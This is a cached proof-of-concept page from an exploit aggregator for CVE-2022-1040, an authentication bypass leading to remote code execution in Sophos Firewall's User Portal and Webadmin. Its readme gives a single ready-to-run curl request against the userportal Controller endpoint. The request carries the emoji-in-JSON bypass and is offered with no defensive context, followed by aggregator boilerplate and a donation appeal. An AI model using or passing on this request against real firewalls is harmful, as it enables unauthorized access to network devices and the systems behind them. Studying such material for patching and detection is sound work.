CVE-2022-1040 PoC — Sophos Firewall 授权问题漏洞

Source

https://github.com/killvxk/CVE-2022-1040

Associated Vulnerability

Title:Sophos Firewall 授权问题漏洞 (CVE-2022-1040)
Description:Sophos Firewall是英国Sophos公司的一款防火墙。 Sophos Firewall version v18.5 MR3 版本及之前版本的 User Portal 和 Webadmin 模块存在授权问题漏洞，该漏洞源于User Portal 和 Webadmin 模块存在身份认证绕过漏洞。攻击者通过该漏洞可以远程执行代码。

Description

may the poc with you

Readme

# CVE-2022-1040
may the poc with you


## 外面捡来的

```
curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST 'https://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"🦞":"test"\}'
```

File Snapshot


 [4.0K]  /data/pocs/d8914d94aa95a5b675eeeeb81e3257cd23ea8e89
└── [ 227]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!